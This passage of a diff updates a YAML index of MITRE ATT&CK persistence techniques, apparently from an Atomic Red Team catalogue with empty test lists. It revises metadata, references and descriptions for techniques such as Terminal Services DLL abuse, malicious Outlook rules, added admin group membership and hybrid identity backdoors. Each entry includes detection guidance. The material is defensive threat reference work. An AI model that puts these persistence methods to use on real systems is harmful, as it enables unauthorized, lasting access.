+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29150,24 +29484,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29259,8 +29625,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29291,71 +29657,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29386,7 +29820,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29441,13 +29875,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29508,9 +29940,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -29519,7 +29951,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -29572,7 +30003,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29593,12 +30024,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -29682,11 +30112,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29699,7 +30128,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -29712,7 +30140,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -29742,7 +30169,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -29774,7 +30202,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -29796,8 +30224,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -29823,7 +30249,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -29849,36 +30275,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -29886,9 +30310,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -29897,21 +30321,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29951,13 +30376,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30034,12 +30456,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30058,6 +30479,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
